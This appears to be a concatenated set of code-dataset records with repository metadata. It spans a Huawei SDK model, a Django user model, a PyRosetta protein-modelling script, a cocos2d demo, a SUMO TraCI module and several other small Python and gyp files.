        :param service_name: The service_name of this UpdateEndpointServiceRequestBody.
        :type: str
        """
        self._service_name = service_name

    @property
    def ports(self):
        """Gets the ports of this UpdateEndpointServiceRequestBody.

        Port mappings exposed by the service. Duplicate mappings are not
        allowed within one service; when several endpoint services share a
        port_id, the (server_port, protocol) combinations must be unique
        across all of them. At most 200 mappings per request.

        :return: The ports of this UpdateEndpointServiceRequestBody.
        :rtype: list[PortList]
        """
        return self._ports

    @ports.setter
    def ports(self, ports):
        """Sets the ports of this UpdateEndpointServiceRequestBody.

        Port mappings exposed by the service; see the getter for limits.

        :param ports: The ports of this UpdateEndpointServiceRequestBody.
        :type: list[PortList]
        """
        self._ports = ports

    @property
    def port_id(self):
        """Gets the port_id of this UpdateEndpointServiceRequestBody.

        UUID identifying the backend resource of the endpoint service:
        LB type - port ID of the load balancer's private IP
        ("vip_port_id" in the ELB API); VM type - NIC ID of the server's
        IP address ("port_id" in the ECS API); VIP type - NIC ID of the
        physical server hosting the virtual resource. When the backend is
        of LB type it may only be changed to the "vip_port_id" of a
        backend of the same LB flavour.

        :return: The port_id of this UpdateEndpointServiceRequestBody.
        :rtype: str
        """
        return self._port_id

    @port_id.setter
    def port_id(self, port_id):
        """Sets the port_id of this UpdateEndpointServiceRequestBody.

        UUID of the backend resource; see the getter for details.

        :param port_id: The port_id of this UpdateEndpointServiceRequestBody.
        :type: str
        """
        self._port_id = port_id

    @property
    def vip_port_id(self):
        """Gets the vip_port_id of this UpdateEndpointServiceRequestBody.

        NIC ID of the virtual IP.

        :return: The vip_port_id of this UpdateEndpointServiceRequestBody.
        :rtype: str
        """
        return self._vip_port_id

    @vip_port_id.setter
    def vip_port_id(self, vip_port_id):
        """Sets the vip_port_id of this UpdateEndpointServiceRequestBody.

        NIC ID of the virtual IP.

        :param vip_port_id: The vip_port_id of this UpdateEndpointServiceRequestBody.
        :type: str
        """
        self._vip_port_id = vip_port_id

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                # Mask values of attributes listed in sensitive_list.
                if attr in self.sensitive_list:
                    result[attr] = "****"
                else:
                    result[attr] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        import simplejson as json
        if six.PY2:
            # Python 2 only: force UTF-8 default encoding so non-ASCII
            # field content serialises without UnicodeDecodeError.
            import sys
            reload(sys)
            sys.setdefaultencoding("utf-8")
        return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)

    def __repr__(self):
        """For `print`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, UpdateEndpointServiceRequestBody):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
aa044018408c1b28331bd6260ab341a84fc5a936
|
bc167f434158921bcf2c678155c5cdfec1c9b0c9
|
/PI_code/simulator/behaviourGeneration/buildBehaviour.py~
|
61fb21ba3d039ecacb623931e2bf58e4efd62509
|
[] |
no_license
|
s0217391/DifferentProjects
|
6450efc89c64ecd21b86c705737e89e5c69433a6
|
7f4da153660817b6cbf72d2e823aa29c0c2f95a9
|
refs/heads/master
| 2021-01-17T02:58:46.219240
| 2015-05-26T22:45:46
| 2015-05-26T22:45:46
| 34,995,164
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 687
|
#!/usr/bin/python
import sys
import expressionBuilder as eb
def writeLine(f, st = '', tabs = 0):
    """Write *st* to file-like *f*, indented by *tabs* single spaces,
    followed by a newline.

    Replaces the original character-by-character string concatenation
    loop with `" " * tabs` (same output, idiomatic and O(tabs)).
    """
    f.write(" " * tabs + st + "\n")
def startFile(f):
    # Emit the boilerplate header of a generated behaviour script:
    # shebang, `import sys`, a blank line, and the `compute` signature.
    writeLine(f, '#!/usr/bin/python');
    writeLine(f, 'import sys');
    writeLine(f)
    writeLine(f, "def compute(prey, otherHunter, dist):")
def main(argv=None):
    """Generate 500 behaviour scripts: group/behav1.py .. group/behav500.py.

    Each script gets the standard header plus a random code block seeded
    by its index (3-25 lines). Returns None, so `sys.exit(main())` exits 0.
    """
    for i in range(0, 500):
        # `with` guarantees each generated file is flushed and closed
        # (the original leaked 500 open file handles).
        with open("group/behav" + str(i + 1) + ".py", 'w') as newscript:
            startFile(newscript)
            lines = eb.generateCodeBlock(seed = i, minlns = 3, maxlns = 25)
            for x in lines:
                (line, tabs) = x
                writeLine(newscript, line, tabs + 1)
if __name__ == "__main__":
sys.exit(main())
|
[
"i7674211@bournemouth.ac.uk"
] |
i7674211@bournemouth.ac.uk
|
|
716b5557af847737363d572821718326db017f6c
|
e2e9ae72910dd29877de026866a6f13335815ca6
|
/prml/kernels/kernel.py
|
03ad8127e24cddaca11a6e7edd0c46a111d14bf3
|
[] |
no_license
|
zshwuhan/PRML
|
b39f09e14cd1169ff44e7299b8adfdd3aea2f94d
|
497d985f6387fc31d5fe861533cb333e06f80469
|
refs/heads/master
| 2021-05-14T23:40:27.351492
| 2017-09-21T12:48:46
| 2017-09-21T12:48:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 540
|
py
|
import numpy as np
class Kernel(object):
    """Base class for kernels; provides the shared pairwise expansion."""

    def _pairwise(self, x, y):
        """Expand x and y into all pairs.

        Parameters
        ----------
        x : (sample_size, n_features)
            input
        y : (sample_size, n_features)
            another input

        Returns
        -------
        output : tuple
            two arrays with shape (len(x), len(y), n_features)
        """
        tiled_x = np.tile(x, (len(y), 1, 1)).transpose(1, 0, 2)
        tiled_y = np.tile(y, (len(x), 1, 1))
        return (tiled_x, tiled_y)
|
[
"r0735nj5058@icloud.com"
] |
r0735nj5058@icloud.com
|
82461d66890b1704b59ea9a59d8c4729e2e080b8
|
f085af63a93cb12feca75a3d9e855c3373d2b78e
|
/dynamic_programming/longest_nondecreasing_subsequence_length.py
|
ec8cd8dc441a12123420e33dfbc9572f6318d970
|
[] |
no_license
|
zjxpirate/Daily-Upload-Python
|
9542f1a3491ac5c843bc80266523bc06c37be20e
|
d5efcfdaf7e632e1f0cb8b21c505c0c0a5325eb0
|
refs/heads/master
| 2020-04-03T08:10:55.667410
| 2019-06-27T01:15:36
| 2019-06-27T01:15:36
| 155,124,951
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 498
|
py
|
# 15. find the longest nondecreasing subsequence
list1 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9]
def longest_nondecreasing_subsequence_length(A):
    """Length of the longest nondecreasing subsequence of A (O(n^2) DP).

    best[i] is the length of the longest nondecreasing subsequence
    ending at A[i].
    """
    best = [1] * len(A)
    for i in range(1, len(A)):
        extendable = [best[j] for j in range(i) if A[i] >= A[j]]
        if extendable:
            best[i] = max(best[i], 1 + max(extendable))
    return max(best)
print(longest_nondecreasing_subsequence_length(list1))
|
[
"j_zhang21@u.pacific.edu"
] |
j_zhang21@u.pacific.edu
|
2482542d358ddfb289a586947cba5d91d129a318
|
f445450ac693b466ca20b42f1ac82071d32dd991
|
/generated_tempdir_2019_09_15_163300/generated_part007021.py
|
2025aafae69c6640949ff7fe65450879584c3cdd
|
[] |
no_license
|
Upabjojr/rubi_generated
|
76e43cbafe70b4e1516fb761cabd9e5257691374
|
cd35e9e51722b04fb159ada3d5811d62a423e429
|
refs/heads/master
| 2020-07-25T17:26:19.227918
| 2019-09-15T15:41:48
| 2019-09-15T15:41:48
| 208,357,412
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,300
|
py
|
from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher137075(CommutativeMatcher):
    # Auto-generated many-to-one matcher for a commutative Mul pattern
    # (sympy rubi integration rules); not meant to be edited by hand.
    _instance = None
    patterns = {
        0: (0, Multiset({}), [
            (VariableWithCount('i2.2.1.0', 1, 1, None), Mul),
            (VariableWithCount('i2.3.1.2.1.0', 1, 1, S(1)), Mul)
        ])
    }
    subjects = {}
    subjects_by_id = {}
    bipartite = BipartiteGraph()
    associative = Mul
    max_optional_count = 1
    anonymous_patterns = set()

    def __init__(self):
        self.add_subject(None)

    @staticmethod
    def get():
        # Lazily created process-wide singleton.
        if CommutativeMatcher137075._instance is None:
            CommutativeMatcher137075._instance = CommutativeMatcher137075()
        return CommutativeMatcher137075._instance

    @staticmethod
    def get_match_iter(subject):
        subjects = deque([subject]) if subject is not None else deque()
        subst0 = Substitution()
        # State 137074
        # NOTE: the bare `return` before `yield` turns this function into
        # a generator that yields nothing -- this matcher has no match
        # states, so callers always get an empty iterator.
        return
        yield
from collections import deque
|
[
"franz.bonazzi@gmail.com"
] |
franz.bonazzi@gmail.com
|
617571ece63ec1c75aaac8ba508201a4956ff656
|
ce741ade3d7ebfc64cf2736358f6e77b06168830
|
/apps/users/models.py
|
548f619885ca2197b733f8ec22122e00804d4162
|
[] |
no_license
|
Erick-LONG/MxShop
|
798a1ce4eb557973732ee6206640bdf9a247216b
|
783e5d66a4d49b3eceb3eb6d7c729fcfa69742cb
|
refs/heads/master
| 2021-04-03T08:31:41.588749
| 2018-03-22T04:01:46
| 2018-03-22T04:01:46
| 124,395,167
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,238
|
py
|
from datetime import datetime
from django.db import models
from django.contrib.auth.models import AbstractUser
# Create your models here.
class UserProfile(AbstractUser):
    '''User profile extending Django's built-in AbstractUser with contact details.'''
    # Real name (verbose_name: 姓名).
    name = models.CharField(max_length=30,null=True,blank=True,verbose_name='姓名')
    # Date of birth (verbose_name: 出生年月).
    birthday = models.DateField(null=True,blank=True,verbose_name='出生年月')
    # Phone number; max_length=11 matches mainland-China mobile numbers.
    mobile = models.CharField(null=True,blank=True,max_length=11,verbose_name='电话')
    # Gender choice ('male'/'female'), defaulting to 'female'.
    gender = models.CharField(max_length=6,choices=(('male','男'),('female','女'),),default='female',verbose_name='性别')
    email = models.EmailField(max_length=100,null=True,blank=True,verbose_name='邮箱')
    class Meta:
        verbose_name = '用户'
        verbose_name_plural = verbose_name
    def __str__(self):
        # Display the login username (inherited from AbstractUser).
        return self.username
class VerifyCode(models.Model):
    '''SMS verification code sent to a phone number.'''
    code = models.CharField(max_length=10,verbose_name='验证码')
    mobile = models.CharField(max_length=11, verbose_name='电话')
    # Callable default: evaluated at save time, not at class definition.
    # NOTE(review): datetime.now is naive local time — confirm USE_TZ setting.
    add_time = models.DateTimeField(default=datetime.now,verbose_name='添加时间')
    class Meta:
        verbose_name = '短信验证码'
        verbose_name_plural = verbose_name
    def __str__(self):
        return self.code
|
[
"834424581@qq.com"
] |
834424581@qq.com
|
60f10d228169389471da351b6d96d2bffe92e6f0
|
2d27360e2038546a38746912fa75dbde8667ee61
|
/make_dogC.py
|
cc4a3b7215091b543f863bdc11c36a5f125ffa5e
|
[
"MIT"
] |
permissive
|
matteoferla/DogCatcher
|
234353eb0e2f8177e59314e62d901b13bed1a265
|
ff7edb88b73aa0585d8f6528ccfc22939c934fb5
|
refs/heads/master
| 2023-05-07T18:16:58.632024
| 2021-06-02T07:23:35
| 2021-06-02T07:23:35
| 257,064,986
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,538
|
py
|
from model_maker import Catcher, pyrosetta
import json
pymol = pyrosetta.PyMOLMover()
dogC = Catcher(lyx=9, asx=121, glh=70, asx_type='ASN', cut_resi=105, other_res=['WAT'],
params_folder='params',
iso_constraint_file='constraints/iso.dogC.cst',
trans_constraint_file='constraints/ASA-LYX.dogC.cst')
## Starting pose
print('Starting pose')
#pose = dogC.load_pose_from_file('data/RrgA.altered.pdb')
pose = dogC.load_pose_from_file('../RrgA.relaxed.pdb')
pymol.pymol_name('init')
pymol.apply(pose)
# dogC.relax_with_ED(pose, 'data/2ww8.ccp4')
pymol.apply(pose)
logbook = {}
s = dogC.get_score_panel(pose, save_variants=True, filename='models/00_initial')
s['description'] = 'PDB:2WW8 734-860 energy minimised against CCP4 map'
logbook['native'] = s
json.dump(logbook, open('scores.json', 'w'))
# G109T
print('G109T')
G109T = dogC.make_mutant(pose, 'G109T')
s = dogC.get_score_panel(G109T, save_variants=True, filename='models/01a_G109T')
s['description'] = 'PDB:2WW8 734-860 G109T'
logbook['G109T'] = s
json.dump(logbook, open('scores.json', 'w'))
pymol.pymol_name('G109T')
pymol.apply(G109T)
# N115G
print('N115G')
N115G = dogC.make_mutant(pose, 'N115G')
s = dogC.get_score_panel(N115G, save_variants=True, filename='models/01b_N115G')
s['description'] = 'PDB:2WW8 734-860 N115G'
logbook['N115G'] = s
json.dump(logbook, open('scores.json', 'w'))
pymol.pymol_name('N115G')
pymol.apply(N115G)
# G109T N115G
print('G109T N115G')
base = dogC.make_mutant(G109T, 'N115G')
s = dogC.get_score_panel(base, save_variants=True, filename='models/02_dogC')
s['description'] = 'PDB:2WW8 734-860 G109T N115G "DogC"'
logbook['dogC'] = s
json.dump(logbook, open('scores.json', 'w'))
pymol.pymol_name('DogC')
pymol.apply(base)
#A75P
print('A75P')
A75P = dogC.make_mutant(base, 'A75P')
dogC.relax_loop(A75P, 73, 80)
s = dogC.get_score_panel(A75P, save_variants=True, filename='models/03_A75P')
s['description'] = 'A75P'
logbook['A75P'] = s
json.dump(logbook, open('scores.json', 'w'))
pair_A = dogC.make_double_mutant(A75P, ['N11D', 'N13T'])
s = dogC.get_score_panel(pair_A, save_variants=True, filename='models/04a_N11D_N13T')
s['description'] = 'N11D N13T A75P'
logbook['N11D N13T'] = s
pair_B = dogC.make_double_mutant(A75P, ['D4E', 'K59T'])
s = dogC.get_score_panel(pair_B, save_variants=True, filename='models/04b_D4E_K59T')
s['description'] = 'D4E K59T A75P'
logbook['D4E K59T'] = s
pair_C = dogC.make_double_mutant(A75P, ['A87E', 'I101A'])
s = dogC.get_score_panel(pair_C, save_variants=True, filename='models/04c_A87E_I101A')
s['description'] = 'A75P A87E I101A'
logbook['A87E I101A'] = s
quad = dogC.make_double_mutant(pair_A, ['D4E', 'K59T'])
s = dogC.get_score_panel(quad, save_variants=True, filename='models/05_D4E_N11D_N13T_K59T')
s['description'] = 'D4E N11D N13T K59T'
logbook['D4E N11D N13T K59T A75P'] = s
for letter, resi in (('d', 'A38P'), ('e','Y45G'), ('f','N47D'), ('g','N92D'), ('h','A87E')):
x = dogC.make_mutant(A75P, resi)
s = dogC.get_score_panel(x, save_variants=True, filename=f'models/04{letter}_{resi}')
s['description'] = f'A75P {resi}'
logbook[resi] = s
json.dump(logbook, open('scores.json', 'w'))
pair_D = dogC.make_double_mutant(A75P, ['A87E', 'I101A'])
s = dogC.get_score_panel(pair_D, save_variants=True, filename='models/04i_N47D_N92D')
s['description'] = 'N47D A75P N92D'
logbook['N47D A75P N92D'] = s
aqua = dogC.make_double_mutant(quad, ['N92D', 'N47D'])
s = dogC.get_score_panel(aqua, save_variants=True, filename='models/06_N47D_N92D')
s['description'] = 'D4E N11D N13T N47D A75P K59T N92D'
logbook['D4E N11D N13T N47D A75P K59T N92D'] = s
F69I = dogC.make_mutant(aqua, 'F69I')
s = dogC.get_score_panel(F69I, save_variants=True, filename='models/07a_F69I')
s['description'] = '+ F69I'
logbook['F69I'] = s
json.dump(logbook, open('scores.json', 'w'))
Q89R = dogC.make_mutant(aqua, 'Q89R')
s = dogC.get_score_panel(Q89R, save_variants=True, filename='models/07b_Q89R')
s['description'] = '+ Q89R'
logbook['Q89R'] = s
json.dump(logbook, open('scores.json', 'w'))
A87S = dogC.make_mutant(aqua, 'A87S')
s = dogC.get_score_panel(A87S, save_variants=True, filename='models/07c_A87S')
s['description'] = '+ A87S'
logbook['A87S'] = s
json.dump(logbook, open('scores.json', 'w'))
phage = dogC.make_double_mutant(aqua, ['Q89R', 'A87S', 'F69I'])
s = dogC.get_score_panel(phage, save_variants=True, filename='models/08_F69I_A87S_Q89R')
s['description'] = '+ F69I A87S Q89R'
logbook['F69I A87S Q89R'] = s
json.dump(logbook, open('scores.json', 'w'))
|
[
"matteo.ferla@gmail.com"
] |
matteo.ferla@gmail.com
|
e0d8b0932a51cce603529841b3292b2ad1ba6353
|
38c10c01007624cd2056884f25e0d6ab85442194
|
/chrome/browser/resources/settings/controls/compiled_resources.gyp
|
75cbbb52ea0a4979d02b08222e3564aa9cac2829
|
[
"BSD-3-Clause"
] |
permissive
|
zenoalbisser/chromium
|
6ecf37b6c030c84f1b26282bc4ef95769c62a9b2
|
e71f21b9b4b9b839f5093301974a45545dad2691
|
refs/heads/master
| 2022-12-25T14:23:18.568575
| 2016-07-14T21:49:52
| 2016-07-23T08:02:51
| 63,980,627
| 0
| 2
|
BSD-3-Clause
| 2022-12-12T12:43:41
| 2016-07-22T20:14:04
| null |
UTF-8
|
Python
| false
| false
| 1,932
|
gyp
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'targets': [
{
'target_name': 'settings_checkbox',
'variables': {
'depends': [
'../../../../../ui/webui/resources/js/compiled_resources.gyp:assert',
'../../../../../ui/webui/resources/js/compiled_resources.gyp:load_time_data',
'../../../../../ui/webui/resources/cr_elements/policy/cr_policy_indicator_behavior.js',
'../../../../../ui/webui/resources/cr_elements/policy/cr_policy_pref_behavior.js',
],
'externs': [
'../../../../../third_party/closure_compiler/externs/settings_private.js'
],
},
'includes': ['../../../../../third_party/closure_compiler/compile_js.gypi'],
},
{
'target_name': 'settings_input',
'variables': {
'depends': [
'../../../../../ui/webui/resources/js/compiled_resources.gyp:assert',
'../../../../../ui/webui/resources/js/compiled_resources.gyp:load_time_data',
'../../../../../ui/webui/resources/cr_elements/policy/cr_policy_indicator_behavior.js',
'../../../../../ui/webui/resources/cr_elements/policy/cr_policy_pref_behavior.js',
],
'externs': [
'../../../../../third_party/closure_compiler/externs/settings_private.js'
],
},
'includes': ['../../../../../third_party/closure_compiler/compile_js.gypi'],
},
{
'target_name': 'settings_radio_group',
'variables': {
'depends': [
'../../../../../ui/webui/resources/js/compiled_resources.gyp:assert',
],
'externs': [
'../../../../../third_party/closure_compiler/externs/settings_private.js'
],
},
'includes': ['../../../../../third_party/closure_compiler/compile_js.gypi'],
},
],
}
|
[
"zeno.albisser@hemispherian.com"
] |
zeno.albisser@hemispherian.com
|
65b8f955f5a177896154f778e3d5a466193e38b0
|
2352bc07e12b0256913559cf3485a360569ccd5e
|
/Practice/code_class/Crossin-practices/python-cocos2d/practice.py
|
03ae4f527a72db206c7f6622f7b49d67d17d3b0c
|
[] |
no_license
|
Dis-count/Python_practice
|
166ae563be7f6d99a12bdc0e221c550ef37bd4fd
|
fa0cae54e853157a1d2d78bf90408c68ce617c1a
|
refs/heads/master
| 2022-12-12T03:38:24.091529
| 2021-12-22T09:51:59
| 2021-12-22T09:51:59
| 224,171,833
| 2
| 1
| null | 2022-12-08T05:29:38
| 2019-11-26T11:07:00
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,050
|
py
|
# -*- coding: utf-8 -*-
import cocos
import random
class Testgame(cocos.layer.Layer):
    """Demo cocos2d layer: shows a label and bounces a sprite around the window."""
    # pass
    def __init__(self):
        super(Testgame,self).__init__()
        # self.logo = cocos.sprite.Sprite()
        # self.logo.position = 550,400
        # self.add(self.logo,9999)
        txt = cocos.text.Label(u'最棒了最棒了')
        txt.position = 300,200
        self.add(txt)
        self.ppx = cocos.sprite.Sprite('ppx_rush1.png')
        self.ppx.position = 200,300
        self.add(self.ppx)
        # Per-tick displacement along each axis (pixels per update call).
        self.speed_x = 3
        self.speed_y = 3
        # Schedule update() to run on every frame tick.
        self.schedule(self.update)
    def update(self,dt):
        # NOTE(review): dt is ignored, so movement is frame-rate dependent.
        # Horizontal bounce: random leftward speed at the right edge (x>600),
        # fixed +3 after crossing the left edge.
        self.ppx.x += self.speed_x
        if self.ppx.x > 600:
            self.speed_x = -(1+4*random.random())
        elif self.ppx.x < 0:
            self.speed_x = 3
        # Vertical bounce between y=0 and y=480 at constant speed.
        self.ppx.y += self.speed_y
        if self.ppx.y > 480:
            self.speed_y = -3
        elif self.ppx.y <0:
            self.speed_y = 3
# Module entry: initialize the director window and run the demo scene.
cocos.director.director.init(caption=u'测试')
cocos.director.director.run(cocos.scene.Scene(Testgame()))
|
[
"492193947@qq.com"
] |
492193947@qq.com
|
98e13b59b62ddedc3ca4697d2082d3d67f574de7
|
eb0fc861564058487117325298eccce468f6ceb8
|
/yo/services/notification_sender/cli.py
|
adae1c7d8b43e370f382cb7e84ec7aa0569d7141
|
[
"MIT"
] |
permissive
|
dpays/dpay-notifications
|
239c92243ae53c485bfa44bb7b7e344203645241
|
32b1cdcd58d622407fd50206053c5b9735a56ba9
|
refs/heads/master
| 2020-03-26T21:19:22.793303
| 2018-09-08T04:26:12
| 2018-09-08T04:26:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 355
|
py
|
# -*- coding: utf-8 -*-
import click
import yo.yolog
@click.command(name='sender')
@click.option('--database_url', envvar='DATABASE_URL')
def yo_noitification_sender_service(database_url):
    # NOTE(review): function name has a typo ("noitification") — left as-is
    # since it is part of the public interface.
    # Import is deferred so `--help` works without the service's dependencies.
    from yo.services.notification_sender import main_task
    main_task(database_url=database_url)
if __name__ == '__main__':
    yo_noitification_sender_service()
|
[
"john.gerlock@gmail.com"
] |
john.gerlock@gmail.com
|
c11ddbb3c8c40a72606cae4a86c24ef46d3da507
|
acf426a78ded4a078063d05457075fedba8f5310
|
/mn_wifi/sumo/traci/_inductionloop.py
|
47c322177a8a427c3fa85e06cc1e7b7947b2c0bb
|
[
"LicenseRef-scancode-x11-stanford"
] |
permissive
|
intrig-unicamp/mininet-wifi
|
3b58e6cf7b422cfe0f8990e173e77d7ba1d54616
|
985bf0ca2f11ca2ba17e44518e0df550070ddfba
|
refs/heads/master
| 2023-08-27T03:36:41.005380
| 2023-07-27T13:07:32
| 2023-07-27T13:07:32
| 35,002,369
| 419
| 278
|
NOASSERTION
| 2023-09-12T03:42:45
| 2015-05-03T22:03:07
|
Python
|
UTF-8
|
Python
| false
| false
| 4,605
|
py
|
# -*- coding: utf-8 -*-
# Eclipse SUMO, Simulation of Urban MObility; see https://eclipse.org/sumo
# Copyright (C) 2011-2017 German Aerospace Center (DLR) and others.
# This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v2.0
# which accompanies this distribution, and is available at
# http://www.eclipse.org/legal/epl-v20.html
# @file _inductionloop.py
# @author Michael Behrisch
# @author Daniel Krajzewicz
# @date 2011-03-16
# @version $Id$
from __future__ import absolute_import
from .domain import Domain
from .storage import Storage
from . import constants as tc
def readVehicleData(result):
    """Parse LAST_STEP_VEHICLE_DATA from a TraCI Storage result.

    Returns a list of [vehID, length, entryTime, leaveTime, typeID]
    entries, one per vehicle that passed the detector.
    """
    result.readLength()
    # NOTE(review): the entry count is read with readDouble() and then fed
    # to range(); range() requires an int — confirm the wire format really
    # delivers an integral double here (or that readDouble returns int).
    nbData = result.readDouble()
    data = []
    for i in range(nbData):
        # Each read("!B") presumably skips a one-byte TraCI type marker
        # before the following value — verify against the storage layout.
        result.read("!B")
        vehID = result.readString()
        result.read("!B")
        length = result.readDouble()
        result.read("!B")
        entryTime = result.readDouble()
        result.read("!B")
        leaveTime = result.readDouble()
        result.read("!B")
        typeID = result.readString()
        data.append([vehID, length, entryTime, leaveTime, typeID])
    return data
_RETURN_VALUE_FUNC = {tc.VAR_POSITION: Storage.readDouble,
tc.VAR_LANE_ID: Storage.readString,
tc.LAST_STEP_VEHICLE_NUMBER: Storage.readDouble,
tc.LAST_STEP_MEAN_SPEED: Storage.readDouble,
tc.LAST_STEP_VEHICLE_ID_LIST: Storage.readStringList,
tc.LAST_STEP_OCCUPANCY: Storage.readDouble,
tc.LAST_STEP_LENGTH: Storage.readDouble,
tc.LAST_STEP_TIME_SINCE_DETECTION: Storage.readDouble,
tc.LAST_STEP_VEHICLE_DATA: readVehicleData}
class InductionLoopDomain(Domain):
    """TraCI value-retrieval domain for induction-loop (E1) detectors.

    Wires the induction-loop command/response constants into the generic
    Domain machinery; each getter delegates to _getUniversal with the
    matching variable constant.
    """
    def __init__(self):
        Domain.__init__(self, "inductionloop", tc.CMD_GET_INDUCTIONLOOP_VARIABLE, None,
                        tc.CMD_SUBSCRIBE_INDUCTIONLOOP_VARIABLE, tc.RESPONSE_SUBSCRIBE_INDUCTIONLOOP_VARIABLE,
                        tc.CMD_SUBSCRIBE_INDUCTIONLOOP_CONTEXT, tc.RESPONSE_SUBSCRIBE_INDUCTIONLOOP_CONTEXT,
                        _RETURN_VALUE_FUNC)
    def getPosition(self, loopID):
        """getPosition(string) -> double
        Returns the position measured from the beginning of the lane in meters.
        """
        return self._getUniversal(tc.VAR_POSITION, loopID)
    def getLaneID(self, loopID):
        """getLaneID(string) -> string
        Returns the id of the lane the loop is on.
        """
        return self._getUniversal(tc.VAR_LANE_ID, loopID)
    def getLastStepVehicleNumber(self, loopID):
        """getLastStepVehicleNumber(string) -> integer
        Returns the number of vehicles that were on the named induction loop within the last simulation step.
        """
        return self._getUniversal(tc.LAST_STEP_VEHICLE_NUMBER, loopID)
    def getLastStepMeanSpeed(self, loopID):
        """getLastStepMeanSpeed(string) -> double
        Returns the mean speed in m/s of vehicles that were on the named induction loop within the last simulation step.
        """
        return self._getUniversal(tc.LAST_STEP_MEAN_SPEED, loopID)
    def getLastStepVehicleIDs(self, loopID):
        """getLastStepVehicleIDs(string) -> list(string)
        Returns the list of ids of vehicles that were on the named induction loop in the last simulation step.
        """
        return self._getUniversal(tc.LAST_STEP_VEHICLE_ID_LIST, loopID)
    def getLastStepOccupancy(self, loopID):
        """getLastStepOccupancy(string) -> double
        Returns the percentage of time the detector was occupied by a vehicle.
        """
        return self._getUniversal(tc.LAST_STEP_OCCUPANCY, loopID)
    def getLastStepMeanLength(self, loopID):
        """getLastStepMeanLength(string) -> double
        Returns the mean length in m of vehicles which were on the detector in the last step.
        """
        return self._getUniversal(tc.LAST_STEP_LENGTH, loopID)
    def getTimeSinceDetection(self, loopID):
        """getTimeSinceDetection(string) -> double
        Returns the time in s since last detection.
        """
        return self._getUniversal(tc.LAST_STEP_TIME_SINCE_DETECTION, loopID)
    def getVehicleData(self, loopID):
        """getVehicleData(string) -> [(veh_id, veh_length, entry_time, exit_time, vType), ...]
        Returns a complex structure containing several information about vehicles which passed the detector.
        """
        return self._getUniversal(tc.LAST_STEP_VEHICLE_DATA, loopID)
InductionLoopDomain()
|
[
"ramonreisfontes@gmail.com"
] |
ramonreisfontes@gmail.com
|
eb7e5849b5f2b010cd504a91f7d1992192d5f1ef
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2634/48102/248806.py
|
7d3c7140dc5506ab531b4029d5a8e97dfc1a1732
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 316
|
py
|
def compare(a):
    """Sort key: the ratio of a pair's first element to its second."""
    numerator, denominator = a[0], a[1]
    return numerator / denominator
def search(ls: list, target: int) -> list:
    """Return the target-th (1-based) pair [ls[i], ls[j]] with i < j,
    ordered ascending by the ratio first/second.
    """
    # Build every ordered pair (i < j) in the same order as a nested
    # index loop, then stably sort by ratio (key helper inlined).
    pairs = [[a, b] for idx, a in enumerate(ls) for b in ls[idx + 1:]]
    pairs.sort(key=lambda p: p[0] / p[1])
    return pairs[target - 1]
# Script entry: read a list literal and a 1-based rank, print the pair.
# NOTE(review): eval() on raw input executes arbitrary code —
# ast.literal_eval would be safer; acceptable only for trusted judge input.
lst = eval(input())
t = int(input())
print(search(lst, t))
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
6ebdf216116dcd30b8c2d256c9d9e25c1236a86e
|
d0533b0574494b13606a557620f38f5a2c74ce16
|
/venv/lib/python3.7/site-packages/mongoengine/base/common.py
|
82d2441786f944d1b4b33738eef42a64caa091a5
|
[
"GPL-1.0-or-later",
"MIT",
"LicenseRef-scancode-other-copyleft"
] |
permissive
|
CatTiger/vnpy
|
af889666464ab661fb30fdb0e8f71f94ba2d1e41
|
7901a0fb80a5b44d6fc752bd4b2b64ec62c8f84b
|
refs/heads/master
| 2020-09-26T00:37:54.123877
| 2020-07-13T10:15:46
| 2020-07-13T10:15:46
| 226,124,078
| 0
| 0
|
MIT
| 2020-04-21T03:02:20
| 2019-12-05T14:44:55
|
C++
|
UTF-8
|
Python
| false
| false
| 1,492
|
py
|
from mongoengine.errors import NotRegistered
__all__ = ('UPDATE_OPERATORS', 'get_document', '_document_registry')
UPDATE_OPERATORS = {'set', 'unset', 'inc', 'dec', 'mul',
'pop', 'push', 'push_all', 'pull',
'pull_all', 'add_to_set', 'set_on_insert',
'min', 'max', 'rename'}
_document_registry = {}
def get_document(name):
